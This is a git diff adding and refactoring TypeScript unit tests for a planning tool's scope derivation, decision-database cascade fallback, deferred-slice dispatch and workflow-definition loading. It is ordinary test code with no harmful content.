+  test("returns undefined for generic titles", () => {
+    // "Integration Testing" → undefined (both words are generic)
+    assert.strictEqual(
+      deriveSliceScope("Integration Testing"),
+      undefined,
+      "returns undefined for generic 'Integration Testing'",
+    );
+
+    // "Setup & Configuration" → undefined (all generic)
+    assert.strictEqual(
+      deriveSliceScope("Setup & Configuration"),
+      undefined,
+      "returns undefined for generic 'Setup & Configuration'",
+    );
+
+    // "Final Review" → undefined
+    assert.strictEqual(
+      deriveSliceScope("Final Review"),
+      undefined,
+      "returns undefined for generic 'Final Review'",
+    );
+
+    // "Basic Implementation" → undefined
+    assert.strictEqual(
+      deriveSliceScope("Basic Implementation"),
+      undefined,
+      "returns undefined for generic 'Basic Implementation'",
+    );
+  });
+
+  test("handles description as additional context", () => {
+    // Generic title but specific description
+    const scope = deriveSliceScope(
+      "Initial Setup",
+      "Configure PostgreSQL database connection",
+    );
+    assert.ok(
+      scope === "postgresql" || scope === "database" || scope === "configure",
+      `expected meaningful scope from description, got '${scope}'`,
+    );
+  });
+
+  test("handles edge cases", () => {
+    // Empty title
+    assert.strictEqual(
+      deriveSliceScope(""),
+      undefined,
+      "returns undefined for empty title",
+    );
+
+    // Short words only
+    assert.strictEqual(
+      deriveSliceScope("A B C"),
+      undefined,
+      "returns undefined for very short words",
+    );
+
+    // Mixed case and punctuation
+    assert.strictEqual(
+      deriveSliceScope("OAuth2 + JWT Authentication"),
+      "oauth2",
+      "handles mixed case and punctuation",
+    );
+  });
+
+  test("filters unit IDs (S01, M001, T03)", () => {
+    // "S01: Infrastructure" → undefined (S01 is a unit ID, infrastructure is generic)
+    assert.strictEqual(
+      deriveSliceScope("S01: Infrastructure"),
+      undefined,
+      "skips S01 ID and returns undefined for generic 'Infrastructure'",
+    );
+
+    // "M001 Setup" → undefined (M001 is a unit ID, setup is generic)
+    assert.strictEqual(
+      deriveSliceScope("M001 Setup"),
+      undefined,
+      "skips M001 ID and returns undefined for generic 'Setup'",
+    );
+
+    // "T03: Database Migration" → "database" (skips T03, returns meaningful word)
+    assert.strictEqual(
+      deriveSliceScope("T03: Database Migration"),
+      "database",
+      "skips T03 ID and returns 'database'",
+    );
+
+    // "S02 Auth Flow" → "auth" (skips S02, returns meaningful word)
+    assert.strictEqual(
+      deriveSliceScope("S02 Auth Flow"),
+      "auth",
+      "skips S02 ID and returns 'auth'",
+    );
+  });
+
+  test("filters process/activity words", () => {
+    // "Integration Testing + Hardening" → undefined (all generic/process words)
+    assert.strictEqual(
+      deriveSliceScope("Integration Testing + Hardening"),
+      undefined,
+      "returns undefined for 'Integration Testing + Hardening'",
+    );
+
+    // "Validation & Verification" → undefined (both are process words)
+    assert.strictEqual(
+      deriveSliceScope("Validation & Verification"),
+      undefined,
+      "returns undefined for 'Validation & Verification'",
+    );
+
+    // "Performance Optimization" → "performance" (optimization is generic, performance is domain)
+    assert.strictEqual(
+      deriveSliceScope("Performance Optimization"),
+      "performance",
+      "extracts 'performance' before generic 'optimization'",
+    );
+
+    // "Security Enhancement" → "security" (enhancement is generic, security is domain)
+    assert.strictEqual(
+      deriveSliceScope("Security Enhancement"),
+      "security",
+      "extracts 'security' before generic 'enhancement'",
+    );
+
+    // "WebSocket Delivery Pipeline" → "websocket"
+    assert.strictEqual(
+      deriveSliceScope("WebSocket Delivery Pipeline"),
+      "websocket",
+      "extracts 'websocket' from delivery pipeline title",
+    );
+
+    // "Prisma Schema + Migration" → "prisma"
+    assert.strictEqual(
+      deriveSliceScope("Prisma Schema + Migration"),
+      "prisma",
+      "extracts 'prisma' from schema migration title",
+    );
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// inlineDecisionsFromDb cascade: R005 implementation
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("inlineDecisionsFromDb: cascade fallback (R005)", () => {
+  beforeEach(() => {
+    openDatabase(':memory:');
+  });
+
+  afterEach(() => {
+    closeDatabase();
+  });
+
+  test("cascade: scoped query returns scoped decisions when they exist", () => {
+    // Insert decisions with different scopes
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'auth',
+      decision: 'use JWT', choice: 'JWT', rationale: 'standard',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S02', scope: 'database',
+      decision: 'use PostgreSQL', choice: 'PostgreSQL', rationale: 'relational',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D003', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use microservices', choice: 'microservices', rationale: 'scalable',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Query with scope 'auth' should return D001 only
+    const authDecisions = queryDecisions({ milestoneId: 'M001', scope: 'auth' });
+    assert.strictEqual(authDecisions.length, 1, 'scoped query returns 1 decision');
+    assert.strictEqual(authDecisions[0]?.id, 'D001', 'returns D001 for auth scope');
+
+    // Query with scope 'database' should return D002 only
+    const dbDecisions = queryDecisions({ milestoneId: 'M001', scope: 'database' });
+    assert.strictEqual(dbDecisions.length, 1, 'scoped query returns 1 decision');
+    assert.strictEqual(dbDecisions[0]?.id, 'D002', 'returns D002 for database scope');
+  });
+
+  test("cascade: milestone-only fallback when scoped query returns empty", () => {
+    // Insert decisions for M001 with generic scope (e.g. 'architecture')
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use microservices', choice: 'microservices', rationale: 'scalable',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S02', scope: 'performance',
+      decision: 'use caching', choice: 'Redis', rationale: 'fast',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Query with scope 'auth' (no decisions with this scope) should return empty
+    const authDecisions = queryDecisions({ milestoneId: 'M001', scope: 'auth' });
+    assert.strictEqual(authDecisions.length, 0, 'scoped query for auth returns empty');
+
+    // Simulate cascade: fallback to milestone-only query
+    const milestoneDecisions = queryDecisions({ milestoneId: 'M001' });
+    assert.strictEqual(milestoneDecisions.length, 2, 'milestone-only query returns 2 decisions');
+    const ids = milestoneDecisions.map(d => d.id).sort();
+    assert.deepStrictEqual(ids, ['D001', 'D002'], 'milestone fallback returns all M001 decisions');
+  });
+
+  test("cascade: returns null when both scoped and milestone queries are empty", () => {
+    // Insert decisions only for M002
+    insertDecision({
+      id: 'D001', when_context: 'M002/S01', scope: 'auth',
+      decision: 'use OAuth', choice: 'OAuth2', rationale: 'standard',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Query M001 with scope should return empty (no M001 decisions at all)
+    const scopedDecisions = queryDecisions({ milestoneId: 'M001', scope: 'auth' });
+    assert.strictEqual(scopedDecisions.length, 0, 'scoped query returns empty');
+
+    // Fallback to milestone-only should also return empty (no M001 decisions)
+    const milestoneDecisions = queryDecisions({ milestoneId: 'M001' });
+    assert.strictEqual(milestoneDecisions.length, 0, 'milestone-only query returns empty');
+
+    // This scenario would result in null from inlineDecisionsFromDb
+    // (we can't directly test inlineDecisionsFromDb here without mocking fs)
+  });
+
+  test("cascade: demonstrates the full cascade behavior", () => {
+    // This test demonstrates the cascade logic that inlineDecisionsFromDb implements:
+    // 1. First try { milestoneId: 'M001', scope: 'payment' } → empty
+    // 2. Then try { milestoneId: 'M001' } → gets D001, D002
+    // 3. Return the milestone-level decisions
+
+    // Setup: decisions exist at milestone level but not for 'payment' scope
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use REST', choice: 'REST API', rationale: 'standard',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S02', scope: 'security',
+      decision: 'use HTTPS', choice: 'TLS 1.3', rationale: 'secure',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Step 1: Query with scope 'payment' (no matches)
+    const paymentDecisions = queryDecisions({ milestoneId: 'M001', scope: 'payment' });
+    assert.strictEqual(paymentDecisions.length, 0, 'payment scope query returns empty');
+
+    // Step 2: Since scope was provided but returned empty, cascade to milestone-only
+    const milestoneDecisions = queryDecisions({ milestoneId: 'M001' });
+    assert.strictEqual(milestoneDecisions.length, 2, 'milestone fallback returns 2 decisions');
+
+    // Step 3: Format and verify content
+    const formatted = formatDecisionsForPrompt(milestoneDecisions);
+    assert.match(formatted, /D001/, 'formatted output includes D001');
+    assert.match(formatted, /D002/, 'formatted output includes D002');
+    assert.match(formatted, /architecture/, 'formatted output includes architecture scope');
+    assert.match(formatted, /security/, 'formatted output includes security scope');
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Integration: scope derivation feeds into cascade
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("integration: scope derivation with cascade", () => {
+  beforeEach(() => {
+    openDatabase(':memory:');
+  });
+
+  afterEach(() => {
+    closeDatabase();
+  });
+
+  test("derived scope finds matching decisions when they exist", () => {
+    // Insert decisions with 'auth' scope
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'auth',
+      decision: 'use JWT', choice: 'JWT tokens', rationale: 'stateless',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Derive scope from slice title
+    const derivedScope = deriveSliceScope("Auth Middleware & Protected Routes");
+    assert.strictEqual(derivedScope, 'auth', 'derives auth scope from title');
+
+    // Query with derived scope should find the decision
+    const decisions = queryDecisions({ milestoneId: 'M001', scope: derivedScope });
+    assert.strictEqual(decisions.length, 1, 'scoped query finds matching decision');
+    assert.strictEqual(decisions[0]?.id, 'D001', 'finds the auth decision');
+  });
+
+  test("generic title triggers milestone-level fallback", () => {
+    // Insert decisions with various scopes
+    insertDecision({
+      id: 'D001', when_context: 'M001/S01', scope: 'architecture',
+      decision: 'use monolith', choice: 'monolith', rationale: 'simple',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+    insertDecision({
+      id: 'D002', when_context: 'M001/S02', scope: 'tooling',
+      decision: 'use TypeScript', choice: 'TypeScript', rationale: 'type safety',
+      revisable: 'yes', made_by: 'agent', superseded_by: null,
+    });
+
+    // Derive scope from generic slice title
+    const derivedScope = deriveSliceScope("Integration Testing");
+    assert.strictEqual(derivedScope, undefined, 'generic title returns undefined scope');
+
+    // Without a scope, query returns all milestone decisions
+    const decisions = queryDecisions({ milestoneId: 'M001', scope: derivedScope });
+    assert.strictEqual(decisions.length, 2, 'no scope filter returns all decisions');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/defer-milestone-stamp.test.ts b/src/resources/extensions/gsd/tests/defer-milestone-stamp.test.ts
new file mode 100644
index 000000000..22a7d7670
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/defer-milestone-stamp.test.ts
@@ -0,0 +1,30 @@
+/**
+ * Regression test for #3542: defer and milestone captures must be stamped
+ * as executed after triage resolution, regardless of directory state.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, readFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { executeTriageResolutions } from "../triage-resolution.ts";
+import { appendCapture, markCaptureResolved, loadAllCaptures } from "../captures.ts";
+
+test("defer captures without milestone ID are stamped as executed (#3542)", async () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-stamp-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  try {
+    appendCapture(base, "Improve error messages");
+    const captures = loadAllCaptures(base);
+    const id = captures[0].id;
+    markCaptureResolved(base, id, "defer", "Deferred to a future UX-polish milestone", "Not urgent");
+
+    executeTriageResolutions(base, "M001", "S01");
+
+    const after = loadAllCaptures(base);
+    const cap = after.find(c => c.id === id);
+    assert.ok(cap?.executed, "Defer capture should be stamped as executed");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/deferred-slice-dispatch.test.ts b/src/resources/extensions/gsd/tests/deferred-slice-dispatch.test.ts
new file mode 100644
index 000000000..879ef7e42
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/deferred-slice-dispatch.test.ts
@@ -0,0 +1,203 @@
+/**
+ * Regression test for #2661: Auto-mode dispatches deferred slices.
+ *
+ * When a decision defers a slice, the dispatcher must skip it and advance
+ * to the next eligible slice. This tests both:
+ *   1. deriveStateFromDb skips slices with status "deferred"
+ *   2. saveDecisionToDb updates the slice status when the decision is a deferral
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveStateFromDb, invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  isDbAvailable,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  insertArtifact,
+  updateSliceStatus,
+} from "../gsd-db.ts";
+import { isDeferredStatus } from "../status-guards.ts";
+
+// ─── Helpers ──────────────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-deferred-dispatch-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, ".gsd", relativePath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+describe("deferred-slice-dispatch (#2661)", () => {
+  test("isDeferredStatus returns true for 'deferred'", () => {
+    assert.ok(isDeferredStatus("deferred"), "should recognize 'deferred'");
+    assert.ok(!isDeferredStatus("active"), "should not match 'active'");
+    assert.ok(!isDeferredStatus("complete"), "should not match 'complete'");
+    assert.ok(!isDeferredStatus("pending"), "should not match 'pending'");
+  });
+
+  test("deriveStateFromDb skips deferred slice and picks next eligible", async () => {
+    const base = createFixtureBase();
+    try {
+      openDatabase(":memory:");
+      assert.ok(isDbAvailable());
+
+      // M001 with three slices: S01 complete, S02 deferred, S03 pending
+      insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Done Slice", status: "complete", risk: "low", depends: [] });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Deferred Slice", status: "deferred", risk: "low", depends: [] });
+      insertSlice({ id: "S03", milestoneId: "M001", title: "Next Slice", status: "pending", risk: "low", depends: [] });
+
+      // S01 needs a SUMMARY file to count as complete for milestone-level checks
+      writeFile(base, "milestones/M001/M001-ROADMAP.md", `# M001: Test Milestone
+
+**Vision:** Test deferred slices.
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > Done.
+
+- [ ] **S02: Deferred Slice** \`risk:low\` \`depends:[]\`
+  > Deferred.
+
+- [ ] **S03: Next Slice** \`risk:low\` \`depends:[]\`
+  > Next.
+`);
+      writeFile(base, "milestones/M001/slices/S01/S01-SUMMARY.md", "# S01 Summary\nDone.");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // The active slice must be S03, NOT S02 (which is deferred)
+      assert.equal(state.activeMilestone?.id, "M001", "active milestone is M001");
+      assert.equal(state.activeSlice?.id, "S03", "active slice should skip deferred S02 and land on S03");
+      assert.notEqual(state.activeSlice?.id, "S02", "active slice must NOT be the deferred S02");
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test("deriveStateFromDb does not count deferred slices as done for progress", async () => {
+    const base = createFixtureBase();
+    try {
+      openDatabase(":memory:");
+
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Complete", status: "complete", risk: "low", depends: [] });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Deferred", status: "deferred", risk: "low", depends: [] });
+      insertSlice({ id: "S03", milestoneId: "M001", title: "Pending", status: "pending", risk: "low", depends: [] });
+
+      writeFile(base, "milestones/M001/M001-ROADMAP.md", `# M001
+## Slices
+- [x] **S01: Complete** \`risk:low\` \`depends:[]\`
+- [ ] **S02: Deferred** \`risk:low\` \`depends:[]\`
+- [ ] **S03: Pending** \`risk:low\` \`depends:[]\`
+`);
+      writeFile(base, "milestones/M001/slices/S01/S01-SUMMARY.md", "# Done");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // Deferred slices should not count as "done" in progress
+      // Only S01 (complete) counts as done
+      assert.equal(state.progress?.slices?.done, 1, "only 1 slice (S01) should be done");
+      // Total should still be 3 (deferred slices are still part of the milestone)
+      assert.equal(state.progress?.slices?.total, 3, "all 3 slices counted in total");
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test("all slices deferred results in blocked state", async () => {
+    const base = createFixtureBase();
+    try {
+      openDatabase(":memory:");
+
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Deferred A", status: "deferred", risk: "low", depends: [] });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Deferred B", status: "deferred", risk: "low", depends: [] });
+
+      writeFile(base, "milestones/M001/M001-ROADMAP.md", `# M001
+## Slices
+- [ ] **S01: Deferred A** \`risk:low\` \`depends:[]\`
+- [ ] **S02: Deferred B** \`risk:low\` \`depends:[]\`
+`);
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // No eligible slice — should be blocked
+      assert.equal(state.activeSlice, null, "no active slice when all deferred");
+      assert.equal(state.phase, "blocked", "phase should be blocked when all slices deferred");
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test("saveDecisionToDb marks slice as deferred when decision is a deferral", async () => {
+    const base = createFixtureBase();
+    try {
+      openDatabase(":memory:");
+
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S03", milestoneId: "M001", title: "Target Slice", status: "active", risk: "low", depends: [] });
+
+      writeFile(base, "milestones/M001/M001-ROADMAP.md", `# M001
+## Slices
+- [ ] **S03: Target Slice** \`risk:low\` \`depends:[]\`
+`);
+
+      const { saveDecisionToDb } = await import("../db-writer.ts");
+      const { getSlice } = await import("../gsd-db.ts");
+
+      // Save a deferral decision that references M001/S03
+      await saveDecisionToDb(
+        {
+          scope: "deferral",
+          decision: "Defer S03 to focus on higher priority work",
+          choice: "defer M001/S03",
+          rationale: "Not ready yet",
+        },
+        base,
+      );
+
+      // The slice status should now be "deferred"
+      const slice = getSlice("M001", "S03");
+      assert.equal(slice?.status, "deferred", "slice status should be updated to 'deferred' after deferral decision");
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/definition-loader.test.ts b/src/resources/extensions/gsd/tests/definition-loader.test.ts
index 55d3d9dfc..b1a90626c 100644
--- a/src/resources/extensions/gsd/tests/definition-loader.test.ts
+++ b/src/resources/extensions/gsd/tests/definition-loader.test.ts
@@ -63,35 +63,33 @@ steps:
 
 // ─── loadDefinition: valid YAML ──────────────────────────────────────────
 
-test("loadDefinition: valid 3-step YAML returns correct structure", () => {
+test("loadDefinition: valid 3-step YAML returns correct structure", (t) => {
   const dir = writeDefYaml(VALID_3STEP_YAML);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
 
-    assert.equal(def.version, 1);
-    assert.equal(def.name, "test-workflow");
-    assert.equal(def.description, "A test workflow");
-    assert.deepEqual(def.params, { topic: "AI" });
-    assert.equal(def.steps.length, 3);
+  const def = loadDefinition(dir, "test-workflow");
 
-    // Step 1: research
-    assert.equal(def.steps[0].id, "research");
-    assert.equal(def.steps[0].name, "Research the topic");
-    assert.equal(def.steps[0].prompt, "Research {{topic}} and write findings to research.md");
-    assert.deepEqual(def.steps[0].requires, []);
-    assert.deepEqual(def.steps[0].produces, ["research.md"]);
+  assert.equal(def.version, 1);
+  assert.equal(def.name, "test-workflow");
+  assert.equal(def.description, "A test workflow");
+  assert.deepEqual(def.params, { topic: "AI" });
+  assert.equal(def.steps.length, 3);
 
-    // Step 2: outline — depends on research
-    assert.equal(def.steps[1].id, "outline");
-    assert.deepEqual(def.steps[1].requires, ["research"]);
+  // Step 1: research
+  assert.equal(def.steps[0].id, "research");
+  assert.equal(def.steps[0].name, "Research the topic");
+  assert.equal(def.steps[0].prompt, "Research {{topic}} and write findings to research.md");
+  assert.deepEqual(def.steps[0].requires, []);
+  assert.deepEqual(def.steps[0].produces, ["research.md"]);
 
-    // Step 3: draft — depends on outline
-    assert.equal(def.steps[2].id, "draft");
-    assert.deepEqual(def.steps[2].requires, ["outline"]);
-    assert.deepEqual(def.steps[2].produces, ["draft.md"]);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  // Step 2: outline — depends on research
+  assert.equal(def.steps[1].id, "outline");
+  assert.deepEqual(def.steps[1].requires, ["research"]);
+
+  // Step 3: draft — depends on outline
+  assert.equal(def.steps[2].id, "draft");
+  assert.deepEqual(def.steps[2].requires, ["outline"]);
+  assert.deepEqual(def.steps[2].produces, ["draft.md"]);
 });
 
 // ─── validateDefinition: rejection cases ─────────────────────────────────
@@ -223,23 +221,21 @@ test("validateDefinition: missing step name → error", () => {
 
 // ─── loadDefinition: error cases ─────────────────────────────────────────
 
-test("loadDefinition: missing file → descriptive error", () => {
+test("loadDefinition: missing file → descriptive error", (t) => {
   const dir = makeTmpDir();
-  try {
-    assert.throws(
-      () => loadDefinition(dir, "nonexistent"),
-      (err: Error) => {
-        assert.ok(err.message.includes("not found"));
-        assert.ok(err.message.includes("nonexistent.yaml"));
-        return true;
-      },
-    );
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  assert.throws(
+    () => loadDefinition(dir, "nonexistent"),
+    (err: Error) => {
+      assert.ok(err.message.includes("not found"));
+      assert.ok(err.message.includes("nonexistent.yaml"));
+      return true;
+    },
+  );
 });
 
-test("loadDefinition: invalid YAML schema → descriptive error", () => {
+test("loadDefinition: invalid YAML schema → descriptive error", (t) => {
   const dir = writeDefYaml(`
 version: 2
 name: "bad"
@@ -248,23 +244,21 @@ steps:
     name: "A"
     prompt: "do A"
 `);
-  try {
-    assert.throws(
-      () => loadDefinition(dir, "test-workflow"),
-      (err: Error) => {
-        assert.ok(err.message.includes("Invalid workflow definition"));
-        assert.ok(err.message.includes("Unsupported version"));
-        return true;
-      },
-    );
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  assert.throws(
+    () => loadDefinition(dir, "test-workflow"),
+    (err: Error) => {
+      assert.ok(err.message.includes("Invalid workflow definition"));
+      assert.ok(err.message.includes("Unsupported version"));
+      return true;
+    },
+  );
 });
 
 // ─── loadDefinition: snake_case → camelCase conversion ───────────────────
 
-test("loadDefinition: depends_on in YAML maps to requires in TypeScript", () => {
+test("loadDefinition: depends_on in YAML maps to requires in TypeScript", (t) => {
   const dir = writeDefYaml(`
 version: 1
 name: "dep-test"
@@ -277,15 +271,13 @@ steps:
     prompt: "do second"
     depends_on: [first]
 `);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
-    assert.deepEqual(def.steps[1].requires, ["first"]);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  const def = loadDefinition(dir, "test-workflow");
+  assert.deepEqual(def.steps[1].requires, ["first"]);
 });
 
-test("loadDefinition: context_from in YAML maps to contextFrom in TypeScript", () => {
+test("loadDefinition: context_from in YAML maps to contextFrom in TypeScript", (t) => {
   const dir = writeDefYaml(`
 version: 1
 name: "ctx-test"
@@ -298,12 +290,10 @@ steps:
     prompt: "do second"
     context_from: [first]
 `);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
-    assert.deepEqual(def.steps[1].contextFrom, ["first"]);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  const def = loadDefinition(dir, "test-workflow");
+  assert.deepEqual(def.steps[1].contextFrom, ["first"]);
 });
 
 // ─── validateDefinition: iterate field validation ────────────────────────
@@ -725,7 +715,7 @@ test("validateDefinition: valid minimal step (no requires/produces) → accepted
   assert.equal(result.errors.length, 0);
 });
 
-test("loadDefinition: loads without params field → params is undefined", () => {
+test("loadDefinition: loads without params field → params is undefined", (t) => {
   const dir = writeDefYaml(`
 version: 1
 name: "no-params"
@@ -734,15 +724,13 @@ steps:
     name: "A"
     prompt: "do A"
 `);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
-    assert.equal(def.params, undefined);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  const def = loadDefinition(dir, "test-workflow");
+  assert.equal(def.params, undefined);
 });
 
-test("loadDefinition: loads without description → description is undefined", () => {
+test("loadDefinition: loads without description → description is undefined", (t) => {
   const dir = writeDefYaml(`
 version: 1
 name: "no-desc"
@@ -751,15 +739,13 @@ steps:
     name: "A"
     prompt: "do A"
 `);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
-    assert.equal(def.description, undefined);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  const def = loadDefinition(dir, "test-workflow");
+  assert.equal(def.description, undefined);
 });
 
-test("loadDefinition: step with no requires/produces defaults to empty arrays", () => {
+test("loadDefinition: step with no requires/produces defaults to empty arrays", (t) => {
   const dir = writeDefYaml(`
 version: 1
 name: "defaults"
@@ -768,11 +754,9 @@ steps:
     name: "A"
     prompt: "do A"
 `);
-  try {
-    const def = loadDefinition(dir, "test-workflow");
-    assert.deepEqual(def.steps[0].requires, []);
-    assert.deepEqual(def.steps[0].produces, []);
-  } finally {
-    try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ }
-  }
+  t.after(() => { try { rmSync(dir, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM */ } });
+
+  const def = loadDefinition(dir, "test-workflow");
+  assert.deepEqual(def.steps[0].requires, []);
+  assert.deepEqual(def.steps[0].produces, []);
 });
diff --git a/src/resources/extensions/gsd/tests/derive-state-crossval.test.ts b/src/resources/extensions/gsd/tests/derive-state-crossval.test.ts
new file mode 100644
index 000000000..a349e2c81
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/derive-state-crossval.test.ts
@@ -0,0 +1,512 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+// derive-state-crossval.test.ts — Cross-validation: deriveStateFromDb() vs _deriveStateImpl()
+// Proves both paths produce field-identical GSDState across 7 fixture scenarios,
+// plus an auto-migration round-trip test.
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  deriveStateFromDb,
+  _deriveStateImpl,
+  invalidateStateCache,
+} from '../state.ts';
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from '../gsd-db.ts';
+import { migrateHierarchyToDb } from '../md-importer.ts';
+import type { GSDState } from '../types.ts';
+
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-crossval-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, '.gsd', relativePath);
+  mkdirSync(join(full, '..'), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+/**
+ * Compare every GSDState field between DB and filesystem derivation.
+ * prefix identifies the scenario in assertion messages.
+ */
+function assertStatesEqual(dbState: GSDState, fileState: GSDState, prefix: string): void {
+  // Phase
+  assert.deepStrictEqual(dbState.phase, fileState.phase, `${prefix}: phase`);
+
+  // Active refs
+  assert.deepStrictEqual(dbState.activeMilestone?.id ?? null, fileState.activeMilestone?.id ?? null, `${prefix}: activeMilestone.id`);
+  assert.deepStrictEqual(dbState.activeMilestone?.title ?? null, fileState.activeMilestone?.title ?? null, `${prefix}: activeMilestone.title`);
